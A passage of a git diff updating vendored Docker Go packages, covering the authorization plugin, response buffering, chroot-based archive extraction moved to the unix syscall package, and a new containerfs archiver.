Msg: "Server Auth Allowed", + } + if err := mdHandler(ctx, resp, req, map[string]string{}); err != nil { + assert.NilError(t, err) + } + + }) + +} diff --git a/vendor/github.com/docker/docker/pkg/authorization/plugin.go b/vendor/github.com/docker/docker/pkg/authorization/plugin.go index 4b1c71bd4b..3316fd870c 100644 --- a/vendor/github.com/docker/docker/pkg/authorization/plugin.go +++ b/vendor/github.com/docker/docker/pkg/authorization/plugin.go @@ -1,4 +1,4 @@ -package authorization +package authorization // import "github.com/docker/docker/pkg/authorization" import ( "sync" @@ -48,9 +48,10 @@ func GetPluginGetter() plugingetter.PluginGetter { // authorizationPlugin is an internal adapter to docker plugin system type authorizationPlugin struct { - plugin *plugins.Client - name string - once sync.Once + initErr error + plugin *plugins.Client + name string + once sync.Once } func newAuthorizationPlugin(name string) Plugin { @@ -61,6 +62,11 @@ func (a *authorizationPlugin) Name() string { return a.name } +// Set the remote for an authz pluginv2 +func (a *authorizationPlugin) SetName(remote string) { + a.name = remote +} + func (a *authorizationPlugin) AuthZRequest(authReq *Request) (*Response, error) { if err := a.initPlugin(); err != nil { return nil, err @@ -90,23 +96,23 @@ func (a *authorizationPlugin) AuthZResponse(authReq *Request) (*Response, error) // initPlugin initializes the authorization plugin if needed func (a *authorizationPlugin) initPlugin() error { // Lazy loading of plugins - var err error a.once.Do(func() { if a.plugin == nil { var plugin plugingetter.CompatPlugin var e error if pg := GetPluginGetter(); pg != nil { - plugin, e = pg.Get(a.name, AuthZApiImplements, plugingetter.LOOKUP) + plugin, e = pg.Get(a.name, AuthZApiImplements, plugingetter.Lookup) + a.SetName(plugin.Name()) } else { plugin, e = plugins.Get(a.name, AuthZApiImplements) } if e != nil { - err = e + a.initErr = e return } a.plugin = plugin.Client() } }) - return err + return 
a.initErr } diff --git a/vendor/github.com/docker/docker/pkg/authorization/response.go b/vendor/github.com/docker/docker/pkg/authorization/response.go index 129bf2f417..6b674bc295 100644 --- a/vendor/github.com/docker/docker/pkg/authorization/response.go +++ b/vendor/github.com/docker/docker/pkg/authorization/response.go @@ -1,4 +1,4 @@ -package authorization +package authorization // import "github.com/docker/docker/pkg/authorization" import ( "bufio" @@ -8,7 +8,7 @@ import ( "net" "net/http" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" ) // ResponseModifier allows authorization plugins to read and modify the content of the http.response @@ -47,6 +47,8 @@ func NewResponseModifier(rw http.ResponseWriter) ResponseModifier { return &responseModifier{rw: rw, header: make(http.Header)} } +const maxBufferSize = 64 * 1024 + // responseModifier is used as an adapter to http.ResponseWriter in order to manipulate and explore // the http request/response from docker daemon type responseModifier struct { @@ -116,11 +118,13 @@ func (rm *responseModifier) OverrideHeader(b []byte) error { // Write stores the byte array inside content func (rm *responseModifier) Write(b []byte) (int, error) { - if rm.hijacked { return rm.rw.Write(b) } + if len(rm.body)+len(b) > maxBufferSize { + rm.Flush() + } rm.body = append(rm.body, b...) 
return len(b), nil } @@ -192,11 +196,14 @@ func (rm *responseModifier) FlushAll() error { var err error if len(rm.body) > 0 { // Write body - _, err = rm.rw.Write(rm.body) + var n int + n, err = rm.rw.Write(rm.body) + // TODO(@cpuguy83): there is now a relatively small buffer limit, instead of discarding our buffer here and + // allocating again later this should just keep using the same buffer and track the buffer position (like a bytes.Buffer with a fixed size) + rm.body = rm.body[n:] } // Clean previous data - rm.body = nil rm.statusCode = 0 rm.header = http.Header{} return err diff --git a/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered.go b/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered.go index 784d65d6fe..6bb285123f 100644 --- a/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered.go +++ b/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered.go @@ -1,4 +1,4 @@ -package broadcaster +package broadcaster // import "github.com/docker/docker/pkg/broadcaster" import ( "io" diff --git a/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered_test.go b/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered_test.go index 9f8e72bc0f..c510584aa3 100644 --- a/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered_test.go +++ b/vendor/github.com/docker/docker/pkg/broadcaster/unbuffered_test.go @@ -1,10 +1,9 @@ -package broadcaster +package broadcaster // import "github.com/docker/docker/pkg/broadcaster" import ( "bytes" "errors" "strings" - "testing" ) diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/archive.go b/vendor/github.com/docker/docker/pkg/chrootarchive/archive.go index a7814f5b90..47c9a2b94c 100644 --- a/vendor/github.com/docker/docker/pkg/chrootarchive/archive.go +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/archive.go @@ -1,4 +1,4 @@ -package chrootarchive +package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive" import ( "fmt" @@ -11,7 +11,16 @@ import ( 
"github.com/docker/docker/pkg/idtools" ) -var chrootArchiver = &archive.Archiver{Untar: Untar} +// NewArchiver returns a new Archiver which uses chrootarchive.Untar +func NewArchiver(idMappings *idtools.IDMappings) *archive.Archiver { + if idMappings == nil { + idMappings = &idtools.IDMappings{} + } + return &archive.Archiver{ + Untar: Untar, + IDMappingsVar: idMappings, + } +} // Untar reads a stream of bytes from `archive`, parses it as a tar archive, // and unpacks it into the directory at `dest`. @@ -30,7 +39,6 @@ func UntarUncompressed(tarArchive io.Reader, dest string, options *archive.TarOp // Handler for teasing out the automatic decompression func untarHandler(tarArchive io.Reader, dest string, options *archive.TarOptions, decompress bool) error { - if tarArchive == nil { return fmt.Errorf("Empty archive") } @@ -41,14 +49,12 @@ func untarHandler(tarArchive io.Reader, dest string, options *archive.TarOptions options.ExcludePatterns = []string{} } - rootUID, rootGID, err := idtools.GetRootUIDGID(options.UIDMaps, options.GIDMaps) - if err != nil { - return err - } + idMappings := idtools.NewIDMappingsFromMaps(options.UIDMaps, options.GIDMaps) + rootIDs := idMappings.RootPair() dest = filepath.Clean(dest) if _, err := os.Stat(dest); os.IsNotExist(err) { - if err := idtools.MkdirAllNewAs(dest, 0755, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChownNew(dest, 0755, rootIDs); err != nil { return err } } @@ -65,33 +71,3 @@ func untarHandler(tarArchive io.Reader, dest string, options *archive.TarOptions return invokeUnpack(r, dest, options) } - -// TarUntar is a convenience function which calls Tar and Untar, with the output of one piped into the other. -// If either Tar or Untar fails, TarUntar aborts and returns the error. -func TarUntar(src, dst string) error { - return chrootArchiver.TarUntar(src, dst) -} - -// CopyWithTar creates a tar archive of filesystem path `src`, and -// unpacks it at filesystem path `dst`. 
-// The archive is streamed directly with fixed buffering and no -// intermediary disk IO. -func CopyWithTar(src, dst string) error { - return chrootArchiver.CopyWithTar(src, dst) -} - -// CopyFileWithTar emulates the behavior of the 'cp' command-line -// for a single file. It copies a regular file from path `src` to -// path `dst`, and preserves all its metadata. -// -// If `dst` ends with a trailing slash '/' ('\' on Windows), the final -// destination path will be `dst/base(src)` or `dst\base(src)` -func CopyFileWithTar(src, dst string) (err error) { - return chrootArchiver.CopyFileWithTar(src, dst) -} - -// UntarPath is a convenience function which looks for an archive -// at filesystem path `src`, and unpacks it at `dst`. -func UntarPath(src, dst string) error { - return chrootArchiver.UntarPath(src, dst) -} diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_test.go b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_test.go index d2d7e621f5..5911a36158 100644 --- a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_test.go +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_test.go @@ -1,4 +1,4 @@ -package chrootarchive +package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive" import ( "bytes" @@ -16,20 +16,40 @@ import ( "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/reexec" "github.com/docker/docker/pkg/system" + "gotest.tools/skip" ) func init() { reexec.Init() } +var chrootArchiver = NewArchiver(nil) + +func TarUntar(src, dst string) error { + return chrootArchiver.TarUntar(src, dst) +} + +func CopyFileWithTar(src, dst string) (err error) { + return chrootArchiver.CopyFileWithTar(src, dst) +} + +func UntarPath(src, dst string) error { + return chrootArchiver.UntarPath(src, dst) +} + +func CopyWithTar(src, dst string) error { + return chrootArchiver.CopyWithTar(src, dst) +} + func TestChrootTarUntar(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that 
requires root") tmpdir, err := ioutil.TempDir("", "docker-TestChrootTarUntar") if err != nil { t.Fatal(err) } defer os.RemoveAll(tmpdir) src := filepath.Join(tmpdir, "src") - if err := system.MkdirAll(src, 0700); err != nil { + if err := system.MkdirAll(src, 0700, ""); err != nil { t.Fatal(err) } if err := ioutil.WriteFile(filepath.Join(src, "toto"), []byte("hello toto"), 0644); err != nil { @@ -43,7 +63,7 @@ func TestChrootTarUntar(t *testing.T) { t.Fatal(err) } dest := filepath.Join(tmpdir, "src") - if err := system.MkdirAll(dest, 0700); err != nil { + if err := system.MkdirAll(dest, 0700, ""); err != nil { t.Fatal(err) } if err := Untar(stream, dest, &archive.TarOptions{ExcludePatterns: []string{"lolo"}}); err != nil { @@ -54,13 +74,14 @@ func TestChrootTarUntar(t *testing.T) { // gh#10426: Verify the fix for having a huge excludes list (like on `docker load` with large # of // local images) func TestChrootUntarWithHugeExcludesList(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") tmpdir, err := ioutil.TempDir("", "docker-TestChrootUntarHugeExcludes") if err != nil { t.Fatal(err) } defer os.RemoveAll(tmpdir) src := filepath.Join(tmpdir, "src") - if err := system.MkdirAll(src, 0700); err != nil { + if err := system.MkdirAll(src, 0700, ""); err != nil { t.Fatal(err) } if err := ioutil.WriteFile(filepath.Join(src, "toto"), []byte("hello toto"), 0644); err != nil { @@ -71,13 +92,13 @@ func TestChrootUntarWithHugeExcludesList(t *testing.T) { t.Fatal(err) } dest := filepath.Join(tmpdir, "dest") - if err := system.MkdirAll(dest, 0700); err != nil { + if err := system.MkdirAll(dest, 0700, ""); err != nil { t.Fatal(err) } options := &archive.TarOptions{} //65534 entries of 64-byte strings ~= 4MB of environment space which should overflow //on most systems when passed via environment or command line arguments - excludes := make([]string, 65534, 65534) + excludes := make([]string, 65534) for i := 0; i < 65534; i++ { excludes[i] = 
strings.Repeat(string(i), 64) } @@ -152,17 +173,15 @@ func compareFiles(src string, dest string) error { } func TestChrootTarUntarWithSymlink(t *testing.T) { - // TODO Windows: Figure out why this is failing - if runtime.GOOS == "windows" { - t.Skip("Failing on Windows") - } + skip.If(t, runtime.GOOS == "windows", "FIXME: figure out why this is failing") + skip.If(t, os.Getuid() != 0, "skipping test that requires root") tmpdir, err := ioutil.TempDir("", "docker-TestChrootTarUntarWithSymlink") if err != nil { t.Fatal(err) } defer os.RemoveAll(tmpdir) src := filepath.Join(tmpdir, "src") - if err := system.MkdirAll(src, 0700); err != nil { + if err := system.MkdirAll(src, 0700, ""); err != nil { t.Fatal(err) } if _, err := prepareSourceDirectory(10, src, false); err != nil { @@ -178,17 +197,15 @@ func TestChrootTarUntarWithSymlink(t *testing.T) { } func TestChrootCopyWithTar(t *testing.T) { - // TODO Windows: Figure out why this is failing - if runtime.GOOS == "windows" || runtime.GOOS == "solaris" { - t.Skip("Failing on Windows and Solaris") - } + skip.If(t, runtime.GOOS == "windows", "FIXME: figure out why this is failing") + skip.If(t, os.Getuid() != 0, "skipping test that requires root") tmpdir, err := ioutil.TempDir("", "docker-TestChrootCopyWithTar") if err != nil { t.Fatal(err) } defer os.RemoveAll(tmpdir) src := filepath.Join(tmpdir, "src") - if err := system.MkdirAll(src, 0700); err != nil { + if err := system.MkdirAll(src, 0700, ""); err != nil { t.Fatal(err) } if _, err := prepareSourceDirectory(10, src, true); err != nil { @@ -228,13 +245,14 @@ func TestChrootCopyWithTar(t *testing.T) { } func TestChrootCopyFileWithTar(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") tmpdir, err := ioutil.TempDir("", "docker-TestChrootCopyFileWithTar") if err != nil { t.Fatal(err) } defer os.RemoveAll(tmpdir) src := filepath.Join(tmpdir, "src") - if err := system.MkdirAll(src, 0700); err != nil { + if err := system.MkdirAll(src, 0700, ""); 
err != nil { t.Fatal(err) } if _, err := prepareSourceDirectory(10, src, true); err != nil { @@ -271,17 +289,15 @@ func TestChrootCopyFileWithTar(t *testing.T) { } func TestChrootUntarPath(t *testing.T) { - // TODO Windows: Figure out why this is failing - if runtime.GOOS == "windows" { - t.Skip("Failing on Windows") - } + skip.If(t, runtime.GOOS == "windows", "FIXME: figure out why this is failing") + skip.If(t, os.Getuid() != 0, "skipping test that requires root") tmpdir, err := ioutil.TempDir("", "docker-TestChrootUntarPath") if err != nil { t.Fatal(err) } defer os.RemoveAll(tmpdir) src := filepath.Join(tmpdir, "src") - if err := system.MkdirAll(src, 0700); err != nil { + if err := system.MkdirAll(src, 0700, ""); err != nil { t.Fatal(err) } if _, err := prepareSourceDirectory(10, src, false); err != nil { @@ -336,13 +352,14 @@ func (s *slowEmptyTarReader) Read(p []byte) (int, error) { } func TestChrootUntarEmptyArchiveFromSlowReader(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") tmpdir, err := ioutil.TempDir("", "docker-TestChrootUntarEmptyArchiveFromSlowReader") if err != nil { t.Fatal(err) } defer os.RemoveAll(tmpdir) dest := filepath.Join(tmpdir, "dest") - if err := system.MkdirAll(dest, 0700); err != nil { + if err := system.MkdirAll(dest, 0700, ""); err != nil { t.Fatal(err) } stream := &slowEmptyTarReader{size: 10240, chunkSize: 1024} @@ -352,13 +369,14 @@ func TestChrootUntarEmptyArchiveFromSlowReader(t *testing.T) { } func TestChrootApplyEmptyArchiveFromSlowReader(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") tmpdir, err := ioutil.TempDir("", "docker-TestChrootApplyEmptyArchiveFromSlowReader") if err != nil { t.Fatal(err) } defer os.RemoveAll(tmpdir) dest := filepath.Join(tmpdir, "dest") - if err := system.MkdirAll(dest, 0700); err != nil { + if err := system.MkdirAll(dest, 0700, ""); err != nil { t.Fatal(err) } stream := &slowEmptyTarReader{size: 10240, chunkSize: 1024} @@ -368,13 
+386,14 @@ func TestChrootApplyEmptyArchiveFromSlowReader(t *testing.T) { } func TestChrootApplyDotDotFile(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") tmpdir, err := ioutil.TempDir("", "docker-TestChrootApplyDotDotFile") if err != nil { t.Fatal(err) } defer os.RemoveAll(tmpdir) src := filepath.Join(tmpdir, "src") - if err := system.MkdirAll(src, 0700); err != nil { + if err := system.MkdirAll(src, 0700, ""); err != nil { t.Fatal(err) } if err := ioutil.WriteFile(filepath.Join(src, "..gitme"), []byte(""), 0644); err != nil { @@ -385,7 +404,7 @@ func TestChrootApplyDotDotFile(t *testing.T) { t.Fatal(err) } dest := filepath.Join(tmpdir, "dest") - if err := system.MkdirAll(dest, 0700); err != nil { + if err := system.MkdirAll(dest, 0700, ""); err != nil { t.Fatal(err) } if _, err := ApplyLayer(dest, stream); err != nil { diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_unix.go b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_unix.go index f2325abd74..5df8afd662 100644 --- a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_unix.go +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_unix.go @@ -1,6 +1,6 @@ // +build !windows -package chrootarchive +package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive" import ( "bytes" @@ -66,10 +66,12 @@ func invokeUnpack(decompressedArchive io.Reader, dest string, options *archive.T cmd.Stderr = output if err := cmd.Start(); err != nil { + w.Close() return fmt.Errorf("Untar error on re-exec cmd: %v", err) } //write the options to the pipe for the untar exec to read if err := json.NewEncoder(w).Encode(options); err != nil { + w.Close() return fmt.Errorf("Untar json encode to pipe failed: %v", err) } w.Close() diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_windows.go b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_windows.go index 0a500ed5c2..f2973132a3 100644 --- 
a/vendor/github.com/docker/docker/pkg/chrootarchive/archive_windows.go +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/archive_windows.go @@ -1,4 +1,4 @@ -package chrootarchive +package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive" import ( "io" diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_linux.go b/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_linux.go index f9d7fed633..9802fad514 100644 --- a/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_linux.go +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_linux.go @@ -1,14 +1,14 @@ -package chrootarchive +package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive" import ( "fmt" "io/ioutil" "os" "path/filepath" - "syscall" "github.com/docker/docker/pkg/mount" rsystem "github.com/opencontainers/runc/libcontainer/system" + "golang.org/x/sys/unix" ) // chroot on linux uses pivot_root instead of chroot @@ -22,12 +22,17 @@ func chroot(path string) (err error) { if rsystem.RunningInUserNS() { return realChroot(path) } - if err := syscall.Unshare(syscall.CLONE_NEWNS); err != nil { + if err := unix.Unshare(unix.CLONE_NEWNS); err != nil { return fmt.Errorf("Error creating mount namespace before pivot: %v", err) } - // make everything in new ns private - if err := mount.MakeRPrivate("/"); err != nil { + // Make everything in new ns slave. + // Don't use `private` here as this could race where the mountns gets a + // reference to a mount and an unmount from the host does not propagate, + // which could potentially cause transient errors for other operations, + // even though this should be relatively small window here `slave` should + // not cause any problems. 
+ if err := mount.MakeRSlave("/"); err != nil { return err } @@ -47,7 +52,7 @@ func chroot(path string) (err error) { defer func() { if mounted { // make sure pivotDir is not mounted before we try to remove it - if errCleanup := syscall.Unmount(pivotDir, syscall.MNT_DETACH); errCleanup != nil { + if errCleanup := unix.Unmount(pivotDir, unix.MNT_DETACH); errCleanup != nil { if err == nil { err = errCleanup } @@ -66,7 +71,7 @@ func chroot(path string) (err error) { } }() - if err := syscall.PivotRoot(path, pivotDir); err != nil { + if err := unix.PivotRoot(path, pivotDir); err != nil { // If pivot fails, fall back to the normal chroot after cleaning up temp dir if err := os.Remove(pivotDir); err != nil { return fmt.Errorf("Error cleaning up after failed pivot: %v", err) @@ -79,17 +84,17 @@ func chroot(path string) (err error) { // This dir contains the rootfs of the caller, which we need to remove so it is not visible during extraction pivotDir = filepath.Join("/", filepath.Base(pivotDir)) - if err := syscall.Chdir("/"); err != nil { + if err := unix.Chdir("/"); err != nil { return fmt.Errorf("Error changing to new root: %v", err) } // Make the pivotDir (where the old root lives) private so it can be unmounted without propagating to the host - if err := syscall.Mount("", pivotDir, "", syscall.MS_PRIVATE|syscall.MS_REC, ""); err != nil { + if err := unix.Mount("", pivotDir, "", unix.MS_PRIVATE|unix.MS_REC, ""); err != nil { return fmt.Errorf("Error making old root private after pivot: %v", err) } // Now unmount the old root so it's no longer visible from the new root - if err := syscall.Unmount(pivotDir, syscall.MNT_DETACH); err != nil { + if err := unix.Unmount(pivotDir, unix.MNT_DETACH); err != nil { return fmt.Errorf("Error while unmounting old root after pivot: %v", err) } mounted = false @@ -98,10 +103,10 @@ func chroot(path string) (err error) { } func realChroot(path string) error { - if err := syscall.Chroot(path); err != nil { + if err := unix.Chroot(path); 
err != nil { return fmt.Errorf("Error after fallback to chroot: %v", err) } - if err := syscall.Chdir("/"); err != nil { + if err := unix.Chdir("/"); err != nil { return fmt.Errorf("Error changing to new root after chroot: %v", err) } return nil diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_unix.go b/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_unix.go index 16354bf648..9a1ee58754 100644 --- a/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_unix.go +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/chroot_unix.go @@ -1,12 +1,12 @@ // +build !windows,!linux -package chrootarchive +package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive" -import "syscall" +import "golang.org/x/sys/unix" func chroot(path string) error { - if err := syscall.Chroot(path); err != nil { + if err := unix.Chroot(path); err != nil { return err } - return syscall.Chdir("/") + return unix.Chdir("/") } diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/diff.go b/vendor/github.com/docker/docker/pkg/chrootarchive/diff.go index 49acad79ff..7712cc17c8 100644 --- a/vendor/github.com/docker/docker/pkg/chrootarchive/diff.go +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/diff.go @@ -1,4 +1,4 @@ -package chrootarchive +package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive" import ( "io" diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/diff_unix.go b/vendor/github.com/docker/docker/pkg/chrootarchive/diff_unix.go index eb0aacc3ab..d96a09f8fa 100644 --- a/vendor/github.com/docker/docker/pkg/chrootarchive/diff_unix.go +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/diff_unix.go @@ -1,6 +1,6 @@ //+build !windows -package chrootarchive +package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive" import ( "bytes" @@ -29,7 +29,7 @@ type applyLayerResponse struct { func applyLayer() { var ( - tmpDir = "" + tmpDir string err error options *archive.TarOptions ) 
diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/diff_windows.go b/vendor/github.com/docker/docker/pkg/chrootarchive/diff_windows.go index 9dd9988de0..8f3f3a4a8a 100644 --- a/vendor/github.com/docker/docker/pkg/chrootarchive/diff_windows.go +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/diff_windows.go @@ -1,4 +1,4 @@ -package chrootarchive +package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive" import ( "fmt" @@ -38,7 +38,7 @@ func applyLayerHandler(dest string, layer io.Reader, options *archive.TarOptions s, err := archive.UnpackLayer(dest, layer, nil) os.RemoveAll(tmpDir) if err != nil { - return 0, fmt.Errorf("ApplyLayer %s failed UnpackLayer to %s", err, dest) + return 0, fmt.Errorf("ApplyLayer %s failed UnpackLayer to %s: %s", layer, dest, err) } return s, nil diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/init_unix.go b/vendor/github.com/docker/docker/pkg/chrootarchive/init_unix.go index 4f637f17b8..a15e4bb83c 100644 --- a/vendor/github.com/docker/docker/pkg/chrootarchive/init_unix.go +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/init_unix.go @@ -1,6 +1,6 @@ // +build !windows -package chrootarchive +package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/chrootarchive/init_windows.go b/vendor/github.com/docker/docker/pkg/chrootarchive/init_windows.go index fa17c9bf83..15ed874e77 100644 --- a/vendor/github.com/docker/docker/pkg/chrootarchive/init_windows.go +++ b/vendor/github.com/docker/docker/pkg/chrootarchive/init_windows.go @@ -1,4 +1,4 @@ -package chrootarchive +package chrootarchive // import "github.com/docker/docker/pkg/chrootarchive" func init() { } diff --git a/vendor/github.com/docker/docker/pkg/containerfs/archiver.go b/vendor/github.com/docker/docker/pkg/containerfs/archiver.go new file mode 100644 index 0000000000..1fb7ff7bdc --- /dev/null +++ 
b/vendor/github.com/docker/docker/pkg/containerfs/archiver.go @@ -0,0 +1,203 @@ +package containerfs // import "github.com/docker/docker/pkg/containerfs" + +import ( + "archive/tar" + "fmt" + "io" + "os" + "path/filepath" + "time" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/system" + "github.com/sirupsen/logrus" +) + +// TarFunc provides a function definition for a custom Tar function +type TarFunc func(string, *archive.TarOptions) (io.ReadCloser, error) + +// UntarFunc provides a function definition for a custom Untar function +type UntarFunc func(io.Reader, string, *archive.TarOptions) error + +// Archiver provides a similar implementation of the archive.Archiver package with the rootfs abstraction +type Archiver struct { + SrcDriver Driver + DstDriver Driver + Tar TarFunc + Untar UntarFunc + IDMappingsVar *idtools.IDMappings +} + +// TarUntar is a convenience function which calls Tar and Untar, with the output of one piped into the other. +// If either Tar or Untar fails, TarUntar aborts and returns the error. +func (archiver *Archiver) TarUntar(src, dst string) error { + logrus.Debugf("TarUntar(%s %s)", src, dst) + tarArchive, err := archiver.Tar(src, &archive.TarOptions{Compression: archive.Uncompressed}) + if err != nil { + return err + } + defer tarArchive.Close() + options := &archive.TarOptions{ + UIDMaps: archiver.IDMappingsVar.UIDs(), + GIDMaps: archiver.IDMappingsVar.GIDs(), + } + return archiver.Untar(tarArchive, dst, options) +} + +// UntarPath untar a file from path to a destination, src is the source tar file path. 
+func (archiver *Archiver) UntarPath(src, dst string) error { + tarArchive, err := archiver.SrcDriver.Open(src) + if err != nil { + return err + } + defer tarArchive.Close() + options := &archive.TarOptions{ + UIDMaps: archiver.IDMappingsVar.UIDs(), + GIDMaps: archiver.IDMappingsVar.GIDs(), + } + return archiver.Untar(tarArchive, dst, options) +} + +// CopyWithTar creates a tar archive of filesystem path `src`, and +// unpacks it at filesystem path `dst`. +// The archive is streamed directly with fixed buffering and no +// intermediary disk IO. +func (archiver *Archiver) CopyWithTar(src, dst string) error { + srcSt, err := archiver.SrcDriver.Stat(src) + if err != nil { + return err + } + if !srcSt.IsDir() { + return archiver.CopyFileWithTar(src, dst) + } + + // if this archiver is set up with ID mapping we need to create + // the new destination directory with the remapped root UID/GID pair + // as owner + rootIDs := archiver.IDMappingsVar.RootPair() + // Create dst, copy src's content into it + if err := idtools.MkdirAllAndChownNew(dst, 0755, rootIDs); err != nil { + return err + } + logrus.Debugf("Calling TarUntar(%s, %s)", src, dst) + return archiver.TarUntar(src, dst) +} + +// CopyFileWithTar emulates the behavior of the 'cp' command-line +// for a single file. It copies a regular file from path `src` to +// path `dst`, and preserves all its metadata. +func (archiver *Archiver) CopyFileWithTar(src, dst string) (err error) { + logrus.Debugf("CopyFileWithTar(%s, %s)", src, dst) + srcDriver := archiver.SrcDriver + dstDriver := archiver.DstDriver + + srcSt, err := srcDriver.Stat(src) + if err != nil { + return err + } + + if srcSt.IsDir() { + return fmt.Errorf("Can't copy a directory") + } + + // Clean up the trailing slash. This must be done in an operating + // system specific manner. 
+ if dst[len(dst)-1] == dstDriver.Separator() { + dst = dstDriver.Join(dst, srcDriver.Base(src)) + } + + // The original call was system.MkdirAll, which is just + // os.MkdirAll on not-Windows and changed for Windows. + if dstDriver.OS() == "windows" { + // Now we are WCOW + if err := system.MkdirAll(filepath.Dir(dst), 0700, ""); err != nil { + return err + } + } else { + // We can just use the driver.MkdirAll function + if err := dstDriver.MkdirAll(dstDriver.Dir(dst), 0700); err != nil { + return err + } + } + + r, w := io.Pipe() + errC := make(chan error, 1) + + go func() { + defer close(errC) + errC <- func() error { + defer w.Close() + + srcF, err := srcDriver.Open(src) + if err != nil { + return err + } + defer srcF.Close() + + hdr, err := tar.FileInfoHeader(srcSt, "") + if err != nil { + return err + } + hdr.Format = tar.FormatPAX + hdr.ModTime = hdr.ModTime.Truncate(time.Second) + hdr.AccessTime = time.Time{} + hdr.ChangeTime = time.Time{} + hdr.Name = dstDriver.Base(dst) + if dstDriver.OS() == "windows" { + hdr.Mode = int64(chmodTarEntry(os.FileMode(hdr.Mode))) + } else { + hdr.Mode = int64(os.FileMode(hdr.Mode)) + } + + if err := remapIDs(archiver.IDMappingsVar, hdr); err != nil { + return err + } + + tw := tar.NewWriter(w) + defer tw.Close() + if err := tw.WriteHeader(hdr); err != nil { + return err + } + if _, err := io.Copy(tw, srcF); err != nil { + return err + } + return nil + }() + }() + defer func() { + if er := <-errC; err == nil && er != nil { + err = er + } + }() + + err = archiver.Untar(r, dstDriver.Dir(dst), nil) + if err != nil { + r.CloseWithError(err) + } + return err +} + +// IDMappings returns the IDMappings of the archiver. 
+func (archiver *Archiver) IDMappings() *idtools.IDMappings { + return archiver.IDMappingsVar +} + +func remapIDs(idMappings *idtools.IDMappings, hdr *tar.Header) error { + ids, err := idMappings.ToHost(idtools.IDPair{UID: hdr.Uid, GID: hdr.Gid}) + hdr.Uid, hdr.Gid = ids.UID, ids.GID + return err +} + +// chmodTarEntry is used to adjust the file permissions used in tar header based +// on the platform the archival is done. +func chmodTarEntry(perm os.FileMode) os.FileMode { + //perm &= 0755 // this 0-ed out tar flags (like link, regular file, directory marker etc.) + permPart := perm & os.ModePerm + noPermPart := perm &^ os.ModePerm + // Add the x bit: make everything +x from windows + permPart |= 0111 + permPart &= 0755 + + return noPermPart | permPart +} diff --git a/vendor/github.com/docker/docker/pkg/containerfs/containerfs.go b/vendor/github.com/docker/docker/pkg/containerfs/containerfs.go new file mode 100644 index 0000000000..7bb1d8c369 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/containerfs/containerfs.go @@ -0,0 +1,87 @@ +package containerfs // import "github.com/docker/docker/pkg/containerfs" + +import ( + "path/filepath" + "runtime" + + "github.com/containerd/continuity/driver" + "github.com/containerd/continuity/pathdriver" + "github.com/docker/docker/pkg/symlink" +) + +// ContainerFS is that represents a root file system +type ContainerFS interface { + // Path returns the path to the root. Note that this may not exist + // on the local system, so the continuity operations must be used + Path() string + + // ResolveScopedPath evaluates the given path scoped to the root. + // For example, if root=/a, and path=/b/c, then this function would return /a/b/c. + // If rawPath is true, then the function will not preform any modifications + // before path resolution. Otherwise, the function will clean the given path + // by making it an absolute path. 
